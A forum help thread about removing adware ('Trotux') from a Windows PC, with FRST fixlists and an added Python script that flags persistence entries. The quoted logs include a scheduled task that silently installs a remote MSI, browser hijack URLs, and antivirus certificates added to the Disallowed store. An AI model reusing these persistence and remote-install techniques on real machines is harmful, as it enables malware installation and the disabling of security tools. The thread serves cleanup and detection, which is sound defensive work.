Trotux virus


(vikijulia) #1

A virus displaying ads has crept onto my computer; unfortunately, scanners don't help.
http://www.wklej.org/id/3297296/


(Atis) #2

Download and run AdwCleaner. Click Scan and then Clean.
Click Scan and show the new FRST and Addition reports.


(vikijulia) #3

http://www.wklej.org/id/3298228/


(Atis) #4

Paste into the system Notepad and save as a text file named fixlist:

CloseProcesses:
WMI_ActiveScriptEventConsumer_ASEC: <==== ATTENTION
HKLM-x32\...\Run: [mcui_exe] => "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
HKLM\...\RunOnce: [JULIA] => C:\Windows\Temp\gABB5.tmp.exe [212992 2017-11-19] () <==== ATTENTION
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-642829381-2403430992-544897393-1002\...\Run: [5xiiaeewkc0] => C:\Users\Julia\AppData\Roaming\wqbew5dtxjq\3vh0jaez33t.exe [8192 2017-08-16] ()
HKU\S-1-5-21-642829381-2403430992-544897393-1002\...\Run: [iuvhbmfuyk4] => C:\Users\Julia\AppData\Roaming\kpyj5cptfy1\rrcgmgdqlsn.exe [8192 2017-08-16] ()
HKU\S-1-5-21-642829381-2403430992-544897393-1002\...\Run: [AKZNVZFTN6ZLYYI] => C:\Program Files\AUHB80CNC0\IX5X83876.exe [1039872 2017-08-16] (27JUS)
HKU\S-1-5-21-642829381-2403430992-544897393-1002\...\Run: [71LDDDUSMFO3CRF] => C:\Program Files\MHF9QLJQZ5\GWXGIP99U.exe [1039872 2017-08-16] (27JUS)
HKU\S-1-5-21-642829381-2403430992-544897393-1002\...\Run: [{EA8630BD-0DCC-4154-B972-AAA6C8989E1A}] => "C:\Users\Julia\Desktop\LeagueofLegends_EUNE_Installer_2016_11_10.exe" /cmdloc "HKCU\Software\Riot Games AiTemp\{EA8630BD-0DCC-4154-B972-AAA6C8989E1A}"
HKLM\...\Providers\5lp7tumu: C:\Program Files (x86)\Araochstjuther Host\local64spl.dll <==== ATTENTION
AppInit_DLLs: C:\ProgramData\Hotfresh\Treefix.dll => No File
GroupPolicy: Restriction - Chrome <==== ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-642829381-2403430992-544897393-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aOvYGqV-IRm7CBqo_hj7JT9jrz5j7DguwsvMwaIw7D5nEnr2xmqx1MjFz8Nql8GLsfZglhtYV5Q6val0d23RtWyvlCg,,&q={searchTerms}
HKU\S-1-5-21-642829381-2403430992-544897393-1002\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aOvYGqV-IRm7CBqo_hj7JT9jrz5j7DguwsvMwaIw7D5nEnr2xmqx1MjFz8Nql8GLsfZglhtYV5Q6val0d23RtWyvlCg,,&q={searchTerms}
URLSearchHook: [S-1-5-21-642829381-2403430992-544897393-1001] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKLM-x32 -> DefaultScope - No Value
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1488483404&z=f5c4349d419ed402ccf75aeg7z5b2bczbbfc5cdtdt&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD212176&q={searchTerms}
SearchScopes: HKU\S-1-5-21-642829381-2403430992-544897393-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aOvYGqV-IRm7CBqo_hj7JT9jrz5j7DguwsvMwaIw7D5nEnr2xmqx1MjFz8Nql8GLsfZglhtYV5Q6val0d23RtWyvlCg,,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-642829381-2403430992-544897393-1002 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1488483404&z=f5c4349d419ed402ccf75aeg7z5b2bczbbfc5cdtdt&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD212176&q={searchTerms}
SearchScopes: HKU\S-1-5-21-642829381-2403430992-544897393-1002 -> {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL = hxxp://www.mystart.com/results.php?pr=vmn&id=toolbarcleaner_ot&v=2_0&ent=ch_5288&q={searchTerms}
SearchScopes: HKU\S-1-5-21-642829381-2403430992-544897393-1002 -> {F8E37551-92D3-4997-9405-A41E3E1E09AD} URL = 
CHR HomePage: ChromeDefaultData -> hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aIS6k8GQSBxu1S9hjH4rz-8dyr5POqo48WvUuagTmeyeP6whkiRTJ50ubRfsLrQwwAU3oz8jwBIPaciuHLUgiGFoMjg,,
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.trotux.com/?z=d287e53564c55992ed1f41bg7z3b4b7c2b8c1w9c8m&from=icb&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD212176&type=hp","hxxp://www.startpageing123.com/?type=hp&ts=1488483404&z=f5c4349d419ed402ccf75aeg7z5b2bczbbfc5cdtdt&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD212176"
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.startpageing123.com/search/?type=ds&ts=1488483404&z=f5c4349d419ed402ccf75aeg7z5b2bczbbfc5cdtdt&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD212176&q={searchTerms}
CHR DefaultSearchKeyword: ChromeDefaultData -> startpageing123
HKU\S-1-5-21-642829381-2403430992-544897393-1002\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Legass\Application\chrome.exe <==== ATTENTION
S2 QForlLgs0EYm Updater; C:\Program Files (x86)\QForlLgs0EYm Updater\QForlLgs0EYm Updater.exe [X]
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== ATTENTION
S0 LHDmgr; System32\DRIVERS\LhdX64.sys [X]
2017-11-18 10:14 - 2017-08-16 19:19 - 000000000 ____D C:\AdwCleaner
2017-11-06 08:25 - 2017-02-27 17:13 - 001289728 ___SH C:\Users\Julia\Desktop\Thumbs.db
2017-08-16 14:54 - 2017-08-16 14:54 - 007649280 _____ () C:\Program Files (x86)\GUT77EB.tmp
2017-08-16 18:55 - 2017-08-16 19:19 - 000009228 _____ () C:\Program Files (x86)\metadata
2017-08-16 18:55 - 2017-08-16 19:37 - 000000040 _____ () C:\Program Files (x86)\settings.dat
2017-02-28 19:45 - 2017-06-29 21:22 - 000000034 _____ () C:\Users\Julia\AppData\Roaming\AdobeWLCMCache.dat
2017-03-01 16:53 - 2017-03-01 16:53 - 000054272 _____ () C:\Users\Julia\AppData\Roaming\ApplicationHosting.dat
2017-03-01 16:53 - 2017-03-01 16:53 - 001892425 _____ () C:\Users\Julia\AppData\Roaming\Homekix.tst
2017-03-01 16:53 - 2017-03-01 16:53 - 000072787 _____ () C:\Users\Julia\AppData\Roaming\Lighthome.tst
2017-03-01 16:53 - 2017-03-01 16:53 - 000126464 _____ () C:\Users\Julia\AppData\Roaming\lobby.dat
2017-03-01 16:53 - 2017-03-01 16:53 - 000032038 _____ () C:\Users\Julia\AppData\Roaming\uninstall_temp.ico
C:\Users\Julia\AppData\Roaming\wqbew5dtxjq
C:\Users\Julia\AppData\Roaming\kpyj5cptfy1
C:\Program Files\AUHB80CNC0
C:\Program Files\MHF9QLJQZ5
C:\Program Files (x86)\Araochstjuther Host
C:\ProgramData\Hotfresh
C:\Program Files (x86)\Legass
Online.io Application (HKLM-x32\...\{F0847AE0-465A-4D7B-A555-AABB43B550F0}) (Version: 2.1.0 - Microleaves) Hidden <==== ATTENTION
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Julia\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
Task: {06E32D0E-016D-4130-A2D6-D6D03D5D27F7} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {0979E505-71AE-4A43-B356-EEB18C1FA264} - System32\Tasks\Tims - The Almy for Windows 8 => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Tims - The Almy for Windows 8\Tims - The Almy for Windows 8.dll",OpZIjtosyulq <==== ATTENTION
C:\Program Files\Tims - The Almy for Windows 8
Task: {152A67AE-F573-4B50-8F3D-B2142318AD96} - System32\Tasks\92I4327C2033V642 => C:\WINDOWS\system32\rundll32.exe "C:\ProgramData\92I4327C2033V642\92I4327C2033V642.dll",ICVgtuQxb <==== ATTENTION
C:\ProgramData\92I4327C2033V642
Task: {5389F852-5CEC-431A-8A3E-5B2085B146AE} - System32\Tasks\application\ucbrowser => C:\WINDOWS\system32\rundll32.exe "C:\ProgramData\92I4327C2033V642\92I4327C2033V642.dll",ICVgtuQxb <==== ATTENTION
Task: {55A2B54A-CCBD-4117-B8A9-437A96BDD917} - System32\Tasks\Online Application v209 Guardian => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
C:\Program Files (x86)\Microleaves
Task: {6BC83DDA-90BD-49C0-9EE1-789F1549B110} - \Microsoft\Windows\Setup\EOSNotify -> No File <==== ATTENTION
Task: {6CD73AF0-54C0-4E19-93EB-0EDF17230FF8} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe
Task: {7BAFA5A1-142D-49AD-BDCB-AA2A5436E397} - System32\Tasks\Online Application v209 => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: {A7693FE7-77EE-4827-892F-7368CB676103} - System32\Tasks\Online Application v209 Guard => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: {B6996BE6-9DAE-45C2-8727-5187A3754B84} - System32\Tasks\Ufocultmadertion => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST1000LM024XHN-M101MBB_S2SMJ9CD212176&v=201731 /q <==== ATTENTION
Task: {D5661FED-43DC-49DA-9E60-5273BBC189D6} - System32\Tasks\OptimizerTask => C:\Users\Julia\AppData\Roaming\The Sims 4 Inc All DLC Deluxe Edition 2017 Eng Repack\yyjyhq.exe
Task: {D6358AEF-66A9-4C05-A1EE-A92979047B1B} - System32\Tasks\security\uclauncher => C:\WINDOWS\system32\rundll32.exe "C:\ProgramData\92I4327C2033V642\92I4327C2033V642.dll",ICVgtuQxb
Task: {F8EF9CB2-9A8A-48D6-9C7E-6FD5738737A0} - System32\Tasks\92I4327C2033V642-dll => C:\WINDOWS\system32\rundll32.exe "C:\ProgramData\92I4327C2033V642\92I4327C2033V642.dll",ICVgtuQxb
Task: {FC44994E-C441-495A-8228-7FE048B12975} - System32\Tasks\Araochstjuther Host => C:\Program Files (x86)\Gazshrasity\rgk.exe
C:\Program Files (x86)\Gazshrasity
Task: C:\WINDOWS\Tasks\Online Application v209 Guard.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application v209 Guardian.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application v209.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
HKLM\...\StartupApproved\Run32: => "mcui_exe"
Hosts:
EmptyTemp:

Run FRST and click Fix. Show the Fixlog removal report.
Click Scan and show the new FRST report without Addition and Shortcut.
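The fixlist above is built by reading the FRST log by hand and copying the lines that matter. As an added example (not part of the thread, and not code from the FRST project), the script below parses a handful of FRST-style lines copied from this thread (the SID and the hijack URLs are shortened, and the sample is constructed for the example) and flags the persistence tricks visible in them: antivirus vendor certificates pushed into the Disallowed store, a WMI ActiveScriptEventConsumer, Run/RunOnce entries that launch from Temp or AppData, a scheduled task that loads a DLL from ProgramData through rundll32, a task that runs msiexec /i against a remote URL, and a search page whose hostname is percent-encoded. The rule names and the thresholds are this example's own heuristics, not FRST logic; only the CloseProcesses: and EmptyTemp: directives are real FRST syntax.

```python
"""Triage of FRST (Farbar Recovery Scan Tool) log lines.

Added example, not from the forum thread and not code from the FRST project.
The sample lines are copied from the thread with the SID and hijack URLs
shortened; the verdict rules are this example's own heuristics.
"""
import re
from urllib.parse import unquote

# Publishers whose code-signing certificates a user would never put in the
# Disallowed store; adware does it so security tools cannot install or update.
AV_VENDORS = (
    "kaspersky", "eset", "avast", "avg technologies", "bitdefender", "malwarebytes",
    "symantec", "mcafee", "f-secure", "trend micro", "comodo", "panda",
    "webroot", "emsisoft", "g data", "avira", "doctor web", "sophos",
)

URL_RE = re.compile(r"hxxps?://([^/\s]+)", re.I)      # FRST defangs http as hxxp
AUTORUN_RE = re.compile(r"\\\.\.\.\\Run(Once)?: \[")  # HKLM\...\Run: [name] => target


def _target(line):
    """Return the launched command/path part of an FRST entry."""
    return line.split(" => ", 1)[1] if " => " in line else line


def _from_data_dir(path):
    """True when the binary lives in Temp, AppData or ProgramData."""
    p = path.lower()
    return any(s in p for s in ("\\temp\\", "\\appdata\\", "\\programdata\\"))


def decode_host(line):
    """Decode a percent-encoded hostname, e.g. %66%65%65%64.%73... -> feed.sonic-search.com."""
    m = URL_RE.search(line)
    return unquote(m.group(1)).lower() if m else None


# (rule name, predicate over one log line); the first matching rule wins.
RULES = [
    ("wmi-event-consumer", lambda l: l.startswith("WMI_ActiveScriptEventConsumer")),
    ("av-cert-blocked", lambda l: "DisallowedCertificates:" in l
        and any(v in l.lower() for v in AV_VENDORS)),
    ("autorun-from-data-dir", lambda l: AUTORUN_RE.search(l) is not None
        and _from_data_dir(_target(l))),
    ("appinit-dll", lambda l: l.startswith("AppInit_DLLs:")),
    ("task-rundll32-from-data-dir", lambda l: l.startswith("Task:")
        and "rundll32.exe" in l.lower() and _from_data_dir(_target(l))),
    ("task-msiexec-remote-msi", lambda l: l.startswith("Task:")
        and re.search(r'msiexec"?\s+/i\s+hxxps?://', l, re.I) is not None),
    ("search-hijack-encoded-host", lambda l: re.search(r"hxxps?://%[0-9a-f]{2}", l, re.I) is not None),
]


def triage(log_text):
    """Return one finding per suspicious line: {'rule', 'line', 'note'}."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        for name, match in RULES:
            if match(line):
                note = decode_host(line) if name.startswith("search-hijack") else ""
                findings.append({"rule": name, "line": line, "note": note})
                break
    return findings


def build_fixlist(findings):
    """FRST's Fix consumes log lines verbatim, so the fixlist is just the
    flagged lines wrapped in the CloseProcesses: / EmptyTemp: directives."""
    body = "\n".join(f["line"] for f in findings)
    return "CloseProcesses:\n" + body + "\nEmptyTemp:\n"


# Constructed sample: lines from the thread, SID and URLs shortened.
SAMPLE_LOG = r"""
WMI_ActiveScriptEventConsumer_ASEC: <==== ATTENTION
HKLM-x32\...\Run: [mcui_exe] => "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
HKLM\...\RunOnce: [JULIA] => C:\Windows\Temp\gABB5.tmp.exe [212992 2017-11-19] () <==== ATTENTION
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKU\S-1-5-21-1002\...\Run: [5xiiaeewkc0] => C:\Users\Julia\AppData\Roaming\wqbew5dtxjq\3vh0jaez33t.exe [8192 2017-08-16] ()
AppInit_DLLs: C:\ProgramData\Hotfresh\Treefix.dll => No File
HKU\S-1-5-21-1002\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=x&q={searchTerms}
Task: {152A67AE-F573-4B50-8F3D-B2142318AD96} - System32\Tasks\92I4327C2033V642 => C:\WINDOWS\system32\rundll32.exe "C:\ProgramData\92I4327C2033V642\92I4327C2033V642.dll",ICVgtuQxb <==== ATTENTION
Task: {B6996BE6-9DAE-45C2-8727-5187A3754B84} - System32\Tasks\Ufocultmadertion => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=X&v=201731 /q <==== ATTENTION
Task: {06E32D0E-016D-4130-A2D6-D6D03D5D27F7} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
"""

if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for f in found:
        print(f"{f['rule']:30} {f['note'] or f['line'][:70]}")
    print(build_fixlist(found))
```

The legitimate McAfee Run entry and the Avast backup task pass through untouched, while every line the helper removed by hand in the first fixlist is caught by one of the rules; the decoded hostname (feed.sonic-search.com) is what you would look up to identify the hijacker family, since the percent-encoding exists only to defeat such a lookup by eye.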


(vikijulia) #5

fixlog: http://www.wklej.org/id/3298546/
FRST: http://www.wklej.org/id/3298548/


(Atis) #6

Paste into the system Notepad and save as a text file named fixlist:

HKU\S-1-5-21-642829381-2403430992-544897393-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aOvYGqV-IRm7CBqo_hj7JT9jrz5j7DguwsvMwaIw7D5nEnr2xmqx1MjFz8Nql8GLsfZglhtYV5Q6val0d23RtWyvlCg,,&q={searchTerms}
URLSearchHook: [S-1-5-21-642829381-2403430992-544897393-1001] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKU\S-1-5-21-642829381-2403430992-544897393-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aOvYGqV-IRm7CBqo_hj7JT9jrz5j7DguwsvMwaIw7D5nEnr2xmqx1MjFz8Nql8GLsfZglhtYV5Q6val0d23RtWyvlCg,,&q={searchTerms}
2017-11-19 12:50 - 2017-11-19 19:07 - 000000000 ____D C:\Users\Julia\Desktop\FRST-OlderVersion
DeleteQuarantine:

Run FRST and click Fix. Then delete the C:\FRST folder.
Cleaning the System Restore folders

Restoring Chrome default settings
Install uBlock: Firefox - Chrome - Opera


(vikijulia) #7

They still open, but in Internet Explorer :confused:


(Atis) #8

Scan again with AdwCleaner and remove the detected threats.

Resetting Internet Explorer settings


(vikijulia) #9

AdwCleaner doesn't detect anything, and the ads still pop up in Chrome and Explorer.


(Atis) #10

Paste into the system Notepad and save as a text file named fixlist:

CloseProcesses:
HKU\S-1-5-21-642829381-2403430992-544897393-1002\...\Run: ['AfaJgaYYP.exe] => C:\Program Files\Windows Photo Viewer\G5KEO8Z8O256ARPA31TL4TMI5PR\'AfaJgaYYP.exe [719872 2017-08-16] ()
HKU\S-1-5-21-642829381-2403430992-544897393-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aOvYGqV-IRm7CBqo_hj7JT9jrz5j7DguwsvMwaIw7D5nEnr2xmqx1MjFz8Nql8GLsfZglhtYV5Q6val0d23RtWyvlCg,,&q={searchTerms}
URLSearchHook: [S-1-5-21-642829381-2403430992-544897393-1001] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKU\S-1-5-21-642829381-2403430992-544897393-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aOvYGqV-IRm7CBqo_hj7JT9jrz5j7DguwsvMwaIw7D5nEnr2xmqx1MjFz8Nql8GLsfZglhtYV5Q6val0d23RtWyvlCg,,&q={searchTerms}
C:\Program Files\Windows Photo Viewer\G5KEO8Z8O256ARPA31TL4TMI5PR
Folder: C:\Program Files\Windows Photo Viewer
EmptyTemp:

Run FRST and click Fix. Show the Fixlog removal report.
Click Scan and show the new FRST, Addition and Shortcut reports.


